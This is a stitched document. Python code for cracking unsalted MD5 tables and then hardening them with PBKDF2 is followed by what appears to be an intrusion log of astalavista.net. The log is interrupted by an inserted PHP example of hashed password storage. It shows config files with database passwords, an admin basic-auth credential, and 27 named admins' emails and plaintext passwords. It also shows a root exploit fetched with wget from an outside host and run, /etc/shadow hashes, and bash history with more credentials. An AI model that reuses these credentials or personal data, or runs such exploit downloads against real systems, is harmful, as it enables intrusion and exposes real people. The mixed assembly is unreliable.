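    return all(HEX32.match(r["password"]) for r in rows)


def shared_hashes(rows) -> dict:
    """Group users by identical hash. Unsalted hashing means identical hash
    equals identical password, so cracking one row cracks the whole group."""
    groups = defaultdict(list)
    for r in rows:
        groups[r["password"]].append(r["username"])
    return {h: users for h, users in groups.items() if len(users) > 1}


def crack_with_wordlist(rows, wordlist) -> dict:
    """Unsalted MD5: one digest per candidate word covers the entire table."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {r["username"]: lookup[r["password"]] for r in rows if r["password"] in lookup}


# ---- hardened storage: per-user random salt and a deliberately slow KDF ----
ITERATIONS = 200_000   # PBKDF2-HMAC-SHA256 cost; raise until ~100 ms per hash


def hash_password(password: str) -> str:
    """Salted, slow hash in a self-describing format (algo$iters$salt$dk)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample rows; the passwords behind the hashes are made up.
SAMPLE_ROWS = [
    {"username": "alice", "password": hashlib.md5(b"admin").hexdigest(), "email": "alice@example.com"},
    {"username": "bob", "password": hashlib.md5(b"admin").hexdigest(), "email": "bob@example.com"},
    {"username": "carol", "password": hashlib.md5(b"correct horse").hexdigest(), "email": "carol@example.com"},
]


def demo() -> dict:
    """Run the three checks over the constructed dump."""
    return {
        "unsalted": looks_unsalted(SAMPLE_ROWS),
        "shared": shared_hashes(SAMPLE_ROWS),
        "cracked": crack_with_wordlist(SAMPLE_ROWS, ["123456", "admin", "password"]),
    }


if __name__ == "__main__":
    print(demo())
    stored = hash_password("admin")
    print(stored, verify_password("admin", stored))
```

With the salted form, two users who pick the same password get different stored values, so a leaked table gives no "same hash, same password" shortcut and every account has to be attacked separately at the KDF's cost.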

=================================================================
sh-3.2$ ls -la ~astanet
total 48
drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow

sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
sh-3.2$ ls -la
total 200
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
-rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
-rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
-rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
-rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
-rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
-rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
-rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
-rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
-rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
-rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
-rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
-rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
-rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki

sh-3.2$ head -20 index.php
/**
* Mainfile (external) for astalavistaNET v2.0
*
* @copyright Astalavista IT Engineering GmbH
* @author Thomas Kaelin
* @version 1.0
*/

if ($_SERVER['PHP_SELF'] == '/webcash.php') {
$dontStartSession = false;
} else {
$dontStartSession = true;
}
require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');

sh-3.2$ cd config
sh-3.2$ ls -la
total 32
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
-rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
-rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
-rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php

sh-3.2$ cat com.conf.php
[snip]
//member-database
$_CONFIG['db_mem_server'] = 'localhost';
$_CONFIG['db_mem_database'] = 'astanet_membersystem';
$_CONFIG['db_mem_user'] = 'astanet_db';
$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mem_debug'] = false; //true or false
//ads-database
$_CONFIG['db_ads_server'] = 'localhost';
$_CONFIG['db_ads_database'] = 'astanet_ads';
$_CONFIG['db_ads_user'] = 'astanet_db';
$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
$_CONFIG['db_ads_debug'] = false; //true or false
//rainbow-database
$_CONFIG['db_rainbow_server'] = '212.254.194.163';
$_CONFIG['db_rainbow_database'] = 'rainbow';
$_CONFIG['db_rainbow_user'] = 'dinu';
$_CONFIG['db_rainbow_password'] = 'dinudinu';
$_CONFIG['db_rainbow_debug'] = false; //true or false
//mailing lists database
$_CONFIG['db_mailing_lists_server'] = 'localhost';
$_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
$_CONFIG['db_mailing_lists_user'] = 'astanet_db';
$_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
//paypal
$_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
$_CONFIG['sub_pp_cmd'] = '_xclick';
$_CONFIG['sub_pp_business'] = 'info@astalavista.net';
$_CONFIG['sub_pp_noship'] = '1';
$_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
[snip]

sh-3.2$ cd ..
sh-3.2$ cd member
sh-3.2$ ls -la
total 20
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
SecFilterEngine off

sh-3.2$ cd ..
sh-3.2$ cd cron
sh-3.2$ ls -la
total 168
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
-rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
-rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
-rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
-rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
-rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
-rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
-rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
-rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
-rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
-rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
-rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
-rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
-rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
-rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
-rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
-rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
-rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
-rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
-rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php

sh-3.2$ cd ..
sh-3.2$ cd _007
sh-3.2$ ls -la
total 24
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
-rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
-rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap

sh-3.2$ cat .htaccess
authType Basic
authName Admin
authUserFile /home/astanet/auth/.htadm_pwd
require valid-user

sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT

sh-3.2$ mysql -u astanet_db -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 275153
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database |
+-----------------------+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| test |
+-----------------------+
6 rows in set (0.00 sec)

mysql> use astanet_membersystem
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_astanet_membersystem |
+-----------------------------------+
| blacklist_categories |
| blacklist_content |
| blacklist_levels |
| blacklist_mcset |
| dir_categories |
| dir_comments |
| dir_links |
| dir_temp |
| dir_votes |
| documents |
| documents_categories |
| email_content |
| email_settings |
| exploits |
| exploits_categories |
| exploittree_categories |
| exploittree_exploits |
| home_values |
| iso_countries |
| links_categories |
| links_records |
| links_unauth |
| links_votes |
| log |
| news_categories |
| news_comments |
| news_emoticons |
| news_latest |
| news_messages |
| news_statistics |
| news_votes |
| prices_content |
| prices_offers |
| rss_settings |
| sessions |
| stats_signups |
| u2u2 |
| u2u_contact |
| u2u_settings |
| user_keywords_selected_categories |
| users |
| users_ipn_test |
| users_keyword_values |
| users_profile |
| users_temp |
| users_upgrade |
+-----------------------------------+
46 rows in set (0.00 sec)

mysql> describe users;
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
| user | varchar(50) | NO | | | |
| nickname | varchar(30) | NO | MUL | anonymous | |
| password | varchar(30) | NO | | | |
| userlevel | tinyint(3) | YES | MUL | NULL | |
| exp | int(8) unsigned | NO | | 0 | |
| email | varchar(50) | NO | | | |
| ip | varchar(15) | NO | | 0 | |
| proxy | set('0','1') | NO | | 0 | |
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
| anz_in | tinyint(1) | NO | | -1 | |
| status | tinyint(1) unsigned | NO | | 0 | |
| checked | set('0','1','2') | NO | | 0 | |
| freemember | set('0','1') | NO | | 0 | |
| ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | |
| lang | tinytext | NO | | | |
| adid | smallint(6) | NO | | 0 | |
| pp_txn_id | varchar(255) | YES | | NULL | |
| cnb_transaction_id | varchar(255) | YES | | NULL | |
| cnb_order_id | varchar(255) | YES | | NULL | |
| cnb_user_id | int(11) | YES | | 0 | |
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
22 rows in set (0.01 sec)

mysql> select count(*) as skids from users;
+-------+
| skids |
+-------+
| 25199 |
+-------+
1 row in set (0.00 sec)

mysql> select user,nickname,password,email from users where userlevel = 1;
+--------------------------+----------------------+------------------+-----------------------------------+
| user | nickname | password | email |
+--------------------------+----------------------+------------------+-----------------------------------+
| pascal | prozac | astaman3 | info@astalavista.net |
| Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com |
| qreymer | Palermo | qblsw85iam | eche@home.se |
| Christian Wehrli | g0atherd | hitt?74 | g0atherd@gmx.net |
| Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk |
| Martin Wyss | dinu | kj63;cXy | martin.wyss@astalavista.net |
| Leandro Nery | Timan_no_Sanco | nery2002 | leandronery@hotmail.com |
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | shavingryansprivates1@hotmail.com |
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | spoofedexistence@hotmail.com |
| David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
| David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net |
| Thomas Kalin | Gwanun | QwErTy123 | thomas.kaelin@astalavista.net |
| Marcus unknown | Cra58cker | hhCr4ck06 | unknownmarcus@hotmail.com |
| David Ellis | dellis203 | philip | dellis@nightwatchnss.com |
| Lars Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com |
| Paulo Santos | Be1er0ph0r1 | amor01 | pmsantos@gmx.ch |
| Thomas Däppen | daha | asta4tom | thomas.daeppen@astalavista.ch |
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com |
| Fabius Bernet | traviser | wellenreiter100 | fabius.bernet@astalavista.ch |
| Zachary McElroy | duder1 | dirty245dix | mcelroyzj@yahoo.com |
| Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com |
| Beatriz Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com |
| Glafkos Charalambous | anonymous2086 | si99490178$# | nowayout@webhostline.com |
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch |
| Peter Fisher | cyph3r1 | testZer025435 | cyph3r@astalavista.com |
| sykadul | sykadul | ak29eral | sykadul@gmail.com |
| Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch |
+--------------------------+----------------------+------------------+-----------------------------------+
27 rows in set (0.00 sec)

mysql> exit;
Bye
===========================================================
Here are the admin usernames and passwords, stored in plain text.
It sounds very ironic.
A site for IT PROFESSIONALS using plain-text passwords. heuheuheu :P
MOVING ON :P
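The `describe users` output above shows a `password varchar(30)` column, and the `select` returns the login passwords themselves. As an added example (not code from the page and not astalavista's own code base), this PHP sketch puts the check implied by that dump next to a hashed-storage version that also migrates legacy plaintext rows on first login; table and column names come from the `describe users` output, while the `$pdo` connection, the `password_hash` column and the `ALTER TABLE` are assumptions.

```php
<?php
// Added example: plaintext credential check vs. hashed storage with
// transparent migration of old rows. Assumes a PDO connection $pdo to
// the astanet_membersystem database (hypothetical) and a new column
// `password_hash` (hypothetical) added with:
//   ALTER TABLE users ADD COLUMN password_hash VARCHAR(255) NULL;

// --- Pattern implied by the dump: the column holds the real password ---
function login_plaintext(PDO $pdo, string $nick, string $pw): bool
{
    // A row only matches if the stored value equals what the user typed,
    // so anyone who can read the table (or a backup of it) has every login.
    $st = $pdo->prepare(
        'SELECT primary_key FROM users WHERE nickname = ? AND password = ?'
    );
    $st->execute([$nick, $pw]);
    return $st->fetchColumn() !== false;
}

// --- Hardened: store only a salted, slow hash; never the password ---
function register_hashed(PDO $pdo, string $user, string $nick, string $email, string $pw): void
{
    // PASSWORD_DEFAULT is bcrypt with a per-user salt; the old `password`
    // column is left empty for new accounts.
    $hash = password_hash($pw, PASSWORD_DEFAULT);
    $st = $pdo->prepare(
        'INSERT INTO users (user, nickname, email, password, password_hash) '
        . "VALUES (?, ?, ?, '', ?)"
    );
    $st->execute([$user, $nick, $email, $hash]);
}

function store_hash(PDO $pdo, int $id, string $hash): void
{
    // Write the hash and wipe the plaintext in the same statement, so a
    // row never ends up with both.
    $st = $pdo->prepare(
        "UPDATE users SET password_hash = ?, password = '' WHERE primary_key = ?"
    );
    $st->execute([$hash, $id]);
}

function login_hashed(PDO $pdo, string $nick, string $pw): bool
{
    static $dummy = null;
    if ($dummy === null) {
        // Verified against when the user does not exist, so a missing
        // account costs the same time as a wrong password.
        $dummy = password_hash('dummy', PASSWORD_DEFAULT);
    }

    $st = $pdo->prepare(
        'SELECT primary_key, password, password_hash FROM users WHERE nickname = ?'
    );
    $st->execute([$nick]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        password_verify($pw, $dummy);
        return false;
    }

    if ($row['password_hash'] !== null && $row['password_hash'] !== '') {
        // Already migrated: verify the hash, and re-hash if the cost
        // parameters have been raised since it was stored.
        if (!password_verify($pw, $row['password_hash'])) {
            return false;
        }
        if (password_needs_rehash($row['password_hash'], PASSWORD_DEFAULT)) {
            store_hash($pdo, (int) $row['primary_key'], password_hash($pw, PASSWORD_DEFAULT));
        }
        return true;
    }

    // Legacy row: compare the old plaintext in constant time, then
    // replace it with a hash so the plaintext disappears on first login.
    if (!hash_equals($row['password'], $pw)) {
        return false;
    }
    store_hash($pdo, (int) $row['primary_key'], password_hash($pw, PASSWORD_DEFAULT));
    return true;
}
```

Rows whose owners never log in again keep their plaintext, so a migration like this should be paired with a forced reset (or a hash-on-the-fly of the existing column followed by deleting it) after a deadline.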

===========================================================
sh-3.2$ uname -a
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2$ wget http://anti.sec.labs/g0troot
--13:33:37-- http://anti.sec.labs/g0troot
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18200 (18K) [text/plain]
Saving to: `g0troot'

100%[=======================>] 18,200 58.6K/s in 0.3s

18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]

sh-3.2$ ./g0troot -i x86_64
[+] g0troot - anti.sec.labs
[+] Target: 2.6.18-128.1.10.el5
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

[+] r00tr00t
[~] Executing shell...

sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# cat /etc/shadow
root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
[snip]
admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::

sh-3.2# cat /etc/motd
#####################################################
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
# |__| [__ | |__| | |__| | | | [__ | |__| #
# | | ___] | | | |___ | | \/ | ___] | | | #
# #
#####################################################
# #
# Admin Contact - support@secureservertech.com #
# #
# Available ShortCuts #
# #
# nst - list active connections #
# ddos - shows how many times each ip is connected #
# ltr - restart the webserver #
# phpc - edit the php config file #
# htc - edit the webserver configuration file #
# up - uptime #
# etd - edit the motd of the day file #
# htr - start and restart apache if needed #
# syng - shows active SYN_RECV connections #
# synd - syn flood blocker - "synd -h" for usage #
#####################################################
# NOTES: #
# Last Upgrade - 12-08-2008 by JF #
# My.cnf/Mysql Optimization - 1-28-09 #
# #
# #
# #
#####################################################

sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009

sh-3.2# ls -la
total 453376
drwxr-x--- 15 root root 4096 Jun 4 08:40 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
-rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
-rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
-rw------- 1 root root 16836 Jun 4 07:21 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rwx------ 1 root root 1899 Oct 28 2007 bk.sh
-rw-r--r-- 1 root root 1327 Nov 29 2007 cert
-rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
drwx------ 2 root root 4096 Oct 28 2007 .elinks
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
-rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
-rw------- 1 root root 0 Apr 16 13:19 .history
-rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
-rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
-rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
-rw------- 1 root root 35 Jun 2 14:23 .lesshst
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
-rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
-rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
-rwx------ 1 root root 760 Sep 18 2008 lp
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
-rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
-rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
-rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
-rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
-rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
-rw------- 1 root root 41 Oct 19 2007 .my.cnf
-rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
-rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
-rw------- 1 root root 41 May 20 2008 .mytop
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
-rw------- 1 root root 1462 Sep 21 2007 opt.php
-rw-r--r-- 1 root root 3371 Sep 22 2007 p
-rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
-rw------- 1 root root 1024 Feb 3 21:32 .rnd
-rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
-rw-r--r-- 1 root root 887 Nov 28 2007 server.key
drwx------ 2 root root 4096 Oct 10 2008 .ssh
-rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
-rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
-rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
-rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
-rw------- 1 root root 12997 May 16 2008 .viminfo

sh-3.2# cat .bash_history
[snip]
wget cp4sst.com/sstlinux.tar.gz
tar zxvf sstlinux.tar.gz
cd linux-2.6.27.10
sh install.sh
make bzImage ; make modules ; make modules_install ; make install
make clean
service mysqld restart
[snip]
cd /usr/sbin/
chmod 4777 traceroute
chmod 4777 ping
traceroute -I www.astalavista.ch
[snip]
vi /etc/csf/csf.conf
traceroute google.ch
service csf restart
tracert google.ch
service csf restart
traceroute www.google.ch
tracert www.google.ch
traceroute www.google.ch
locate traceroute
chown 4755 /bin/traceroute
chown 4777 /bin/traceroute
locate ping
chown 4755 /bin/ping
chown 4777 /bin/ping
cd /bin/
ls -ali | grep ping
chown root ping
chmod 4755 ping
ls -ali | grep traceroute
chown root traceroute
chmod 4755 traceroute
ls -ali | grep traceroute
traceroute -I www.google.ch
traceroute www.google.ch
whois pmsantos.ch
[snip]
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
top
ping ssth.ch
ping asdlkfaljgasd???ljg???lasj.ch
ping asdlkfaljgasdlasj.ch
ping www.ssth.ch
ping ssth.ch
nslookup www.google.ch
nslookup www.ssth.ch
man nslookup
ping www.google.ch
nslookup www.google.ch
nslookup www.google.ch
nslookup salfjasdlf.ch
[snip]
openssl passwd -1 sadf
openssl passwd -1 5cZNHstdTy
mysql
mysql
locate proftp
vi /etc/proftpd.passwd
service proftpd restart
locate proftpd.conf
vi /etc/proftpd.conf
vi /etc/proftpd.passwd
service proftpd restart
[snip]
/bin/sh /home/com/backup_system/backup.sh
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
ls -ali
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
crontab -l
crontab -l
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
/home/com/public_html/modifications/cronjobs/exploits.sh
wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
cd lsws-4.0.3
sh install.sh
uptime
hdparm -tt /dev/sda
iostat
yum install iostat
iostat
whereis iostat
yjm clean all
yum clean all ; yum -y update
iostat
yum install systat
rpm -qa | grep iostat
rpm -qa | grep sysstat
rpm -qa | grep systat
dmesg -c
sysctl -p
uname -r
cd /usr/src
wget nix101.com/kernels/sstlinux.tar.gz
shutdown -r now
nano -w /boot/grub/grub.conf

